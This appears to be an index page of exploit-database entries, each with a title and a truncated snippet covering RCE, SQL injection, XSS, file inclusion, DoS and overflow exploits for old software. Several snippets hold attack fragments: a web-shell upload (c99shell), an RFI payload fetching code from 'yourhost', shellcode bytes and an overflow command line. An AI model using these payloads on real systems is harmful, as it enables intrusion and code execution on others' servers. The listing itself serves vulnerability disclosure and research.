webSPELL <= 4.01.02 Remote PHP Code Execution Exploit
No description provided by source. !/usr/bin/php ?php errorreportingEALL ^ ENOTICE; Admin id: 1 Admin hash: 7b24afc8bc80e548d66c4e7ff72171c5 Logged in wsauth=1%3A7b24afc8bc80e548d66c4e7ff72171c5 Trying to upload the malicious file Done http://localhost/webspell4.01.02/downloads/c99shell.php if$ar...
DD-WRT v24-sp1 - (CSRF) Cross Site Reference Forgery Exploit
No description provided by source. Remote root dd-wrt Written by Michael Brooks Special thanks to str0ke Exploits tested on the newest stable version: Firmware: DD-WRT v24-sp1 07/27/08 micro Product Homepage:...
Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1756/info If Index Server is enabled in Microsoft Internet Information Server 5.0, it is possible for a remote user to view the entire root directory structure and all sub-directories due to a flaw in the Web Distributed...
AstroCMS Multiple Vulnerabilities
No description provided by source. Exploit Title: AstroCMS Multiple Remote Vulnerabilities Google Dork: none Date: 12.03.2011 Author: brainpillow Software Link: http://www.astrocms.com/ Version: UNKNOWN ============================================================ FORGOTPASSWORD SQL-INJ EXPLOIT:...
vBulletin 3.6.10/3.7.2 '$newpm[title]' Parameter Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/30777/info vBulletin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the...
NT IIS4 Remote Web-Based Administration Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/189/info Web-based administration for IIS 4.0 is, by default, limited to the local loopback address, 127.0.0.1. In instances where IIS4.0 was installed as an upgrade to IIS 2.0 or 3.0, a legacy ISAPI DLL ISM.DLL is left i...
Java storeImageArray() Invalid Array Indexing Vulnerability
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'rex' class...
Adobe Acrobat Reader and Flash - 'newfunction' Remote Code Execution Vulnerability
No description provided by source. ''' http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/...
Media Player Classic 1.3.1774.0 - (mpcpl) Local DoS (PoC) (0day)
No description provided by source. !\C:\Perl\bin In The Name Of Allah The Merciful Title : Media Player Classic V1.3.1774.0 mpcpl 0day suffer from local Denial of Service PoC Tested : Windows xp sp3 AUThoR: R3d-D3v!L Credits to : XP10HACKER XP10.ME-xp10.com print qq Media Player Classic...
Campsite 2.6.1 User.php g_documentRoot Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. Exploiting this issue allows remote attackers to execute code in the context of the webserver. This issue affects Campsite 2.6.1. Earlier...
Interspire TrackPoint NX Index.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/16214/info TrackPoint NX is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary...
Claroline 1.x admin/campusProblem.php view Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/25521/info Claroline is prone to a local file-include vulnerability and multiple cross-site scripting vulnerabilities. An attacker could exploit these issues to execute local script code in the context of the application...
Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/299/info The full physical path name for the IIS web server root directory may be obtained by attempting to view a non-existent .IDC file. The web server will return an error message that lists the absolute pathname of th...
Blender 2.34, 2.35a, 2.4, 2.49b .blend File Command Injection
No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Blender .blend Project Arbitrary Command Execution 1. Advisory Information Title: Blender .blend Project Arbitrary Command Executio...
Bubla <= 0.9.2 (bu_dir) Multiple Remote File Include Vulnerabilities
No description provided by source. DeltasecurityTEAM WwW.Deltasecurity.iR Portal Name = Bubla 0.9.1 Class = Remote File Inclusion Risk = High Remote File Execution Download = http://download.sourceforge.net/pub/sourceforge/b/bu/bubla/bubla-0.9.1.tar.gz Discovered By = DeltahackingTEAM User In Delt...
digiSHOP 2.0.2 - SQL Injection Vulnerability
No description provided by source. Private Place Of 0days ^Exploit Title : ^Date : 23/7/2010 ^Vendor Site :...
Sun Java System Web Server 6.1/7.0 WebDAV Format String Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/37910/info Sun Java System Web Server is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input. The issue affects the WebDAV functionality. Currently very few technical details a...
AIDeX Mini-WebServer <= 1.1 - Remote Denial of Service Crash Exploit
No description provided by source. import socket print --------------------------------------------------------------------- print AID'eX Mini-Webserver Verion 1.1 early Release 3 Denial of Service print url: http://www.aidex.de/software/webserver/ print author: shinnai print mail:...
CA BrightStor HSM <= r11.5 - Remote Stack Based Overflow / DoS
No description provided by source. !/usr/bin/perl ...
SGI IRIX 5.3/6.2,SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/72/info Under normal operation LicenseManager1M is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager1M to overwrit...
PineApp Mail-SeCure livelog.html Arbitrary Command Execution
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...
MiNBank 1.5.0 - Multiple Remote File Inclusion Vulnerability
No description provided by source. Author : By DaRkLiFe Greetz : str0ke & S.VV.A.T. Script : Micronation Banking Systemminba 1.5.0 Remote File Inclusion Vulnerabilities Download: http://downloads.sourceforge.net/minbank/minbav0150.zip?modtime=1169500084&bigmirror=0 Exploit :...
MDBMS 0.96/0.99 Query Display Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/2867/info MDBMS is a free relational database management system. A buffer overflow condition exists in MDBMS. By issuing the '\s' command to display the query buffer when it contains a large amount of data, it may be...
Woltlab 1.1/2.x Info-DB Info_db.PHP Multiple SQL Injection Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/15214/info Info-DB is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to...
NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses
No description provided by source. source: http://www.securityfocus.com/bid/31853/info MIFARE Classic is prone to multiple security weaknesses: 1. A security weakness may allow attackers to recover the internal state of the linear feedback shift register. 2. A security weakness may allow attacker...
Gphotos 1.4/1.5 diapo.php rep Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/17967/info Gphotos is prone to multiple input-validation vulnerabilities. The issues include information-disclosure and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properl...
TrouSerS Denial of Service Vulnerability
No description provided by source. crashtcsd.py Copyright c 2012 Andy Lutomirski. All rights reserved. Permission is granted to anyone to copy and redistribute this file verbatim. Permission is not granted to distribute modified copies or derivative works. import struct import socket import time...
4images 1.7.9 - Multiple Vulnerabilities
No description provided by source. Vulnerability ID: HTB22950 Reference: http://www.htbridge.ch/advisory/sqlinjectionin4images.html Product: 4images Vendor: http://www.4homepages.de/ Vulnerable Version: 1.7.9 Vendor Notification: 07 April...
Portix-PHP 0.4 Index.PHP Directory Traversal Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/4038/info Portix-PHP is freely available web portal software. It is written in PHP and will run on most Unix and Linux variants. Portix-PHP is prone to directory traversal attacks. The script index.php does not sufficient...
Joomla Kunena Component (index.php, search parameter) SQL Injection
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register import re class TestPOCPOCBase: vulID = '75964' ssvid version = '1.0' author = 'kikay' vulDate = '2012-11-21' createDate ...
TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include Vulnerability
No description provided by source. Tagmin C.C 2.1.B Remote File Include +Advisory 3 +Product :Tagmin Control Center 2.1.B +Develop: http://ds3.bbminc.net/tagit2b/ +Dork: inurl:/tagit2b/ +Vulnerable: Remote File Include +Risk:High +Discovered:by Kernel-32 +Contact: [email protected] +Homepag...
Wordpress Relocate Upload Plugin 0.14 Remote File Inclusion
At line 16 of relocate-upload.php, the incoming abspath is not filtered, which allows arbitrary local or remote file inclusion. if isset$GET'rufolder' // WP setup and function access define'WPUSETHEMES', false; requireonceurldecode$GET'abspath'.'/wp-load.php'; // save us looking for it, it's passed as a GET parameterarameter...
Saxon 5.4 Menu.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/26237/info Saxon is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser...
Nagios Plugin check_ups Local Buffer Overflow PoC
No description provided by source. Advisory: Nagios Plugin 'checkups' local buffer overflow Author: Stefan Schurtz Contact: [email protected] Affected Software: Successfully tested on nagios-plugins-1.4.15 Vendor URL: http://nagiosplugins.org/ ./checkups -u perl -e 'print Ax16407' buffer...
UFO: Alien Invasion 2.2.1 - Remote Arbitrary Code Execution Vulnerability
No description provided by source. Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion June 18th, 2010 Summary Name: Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion Release...
netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 29 bytes
No description provided by source. / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid0, 0; execve/bin//sh, ..., NULL; note: unsafe shellcode, but 29 bytes long; doesn't work if eax & 0x40000000 != 0; / include sys/types.h include stdio.h include string.h char scode = \x99 // cltd...
Sun Java JRE getSoundbank file:// URI Buffer Overflow
No description provided by source. $Id: javagetsoundbankbof.rb 10394 2010-09-20 08:06:27Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and term...
MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free
No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def...
Joomla Component com_wmtpic 1.0 - SQL Injection Vulnerability
No description provided by source. I'm RoAdKiLlEr member from Inj3ct0r Team +Title : Joomla Component comwmtpic SQL Injection Vulnerability +Author : RoAdKiLlEr +Contact : RoAdKiLlEratKhg-CrewdotWs +Tested on : W...
jira 4.4.3, greenhopper < 5.9.8 - Multiple Vulnerabilities
No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 CVE-2012-1500, Stored XSS in JIRA v4.4.3663-r165197, GreenHopper Resolved in Version 5.9.8, Proof of Concept External References: CVE-2112-1500 CVE-2112-1500 XSS.Cx Blog GHS-5642 Reported to Vendor on Mar 7, 2012,...
IceWarp Universal WebMail /mail/include.html - Crafted HTTP_USER_AGENT Arbitrary File Access
No description provided by source. source: http://www.securityfocus.com/bid/16069/info IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites. An attacker can explo...
Microsoft Windows XP/ME Help and Support Center Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/6966/info The Microsoft Windows ME Help and Support Center is prone to a buffer overflow. This is due to insufficient bounds checking on input supplied through the HCP URI parameter. An attacker can exploit this...
CoolForum 0.x Editpost.PHP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/18268/info CoolForum is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow...
phpBazar <= 2.1.0 - Remote (Include/Auth Bypass) Vulnerabilities
No description provided by source. Title: phpBazar = 2.1.0 Multiple vulnerabilities URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password:...
TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - CSRF Vulnerability
No description provided by source...
TYPSoft FTP Server 1.10 - RETR Command DoS
No description provided by source. Tested on: Windows XP, SP2 EN !/usr/bin/python print \n print RedTeam Security print TYPSoft FTP Server RETR Command DoS print Version 1.10 print print Jeremiah Talamantes print [email protected] print \n import socket import sys Description: RETR command...
ECI Telecom B-Focus ADSL2+ Combo332+ Wireless Router Information Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/20834/info ECI Telecom's B-FOCuS ADSL2+ Combo332+ wireless router is prone to an information-disclosure vulnerability. The router's Web-Based Management interface fails to authenticate users before providing access to...
ESET Smart Security <= 3.0.672 (epfw.sys) Privilege Escalation Exploit
No description provided by source. ESET, LLC. - http://www.eset.com/ Affected Software:...
GNU Mailman 2.0.x Admin Login Variant Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/5299/info GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code. A user visiting the link...
ADODB < 4.70 (tmssql.php) Denial of Service Vulnerability
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo ADODB tmssql.php Denial of service\r\n; echo by rgod [email protected]\r\n; echo site: http://retrogod.altervista.org\r\n\r\n; if $argc4 echo Usage: php .$argv0. host path redo OPTIONS\r\n; echo host: target server...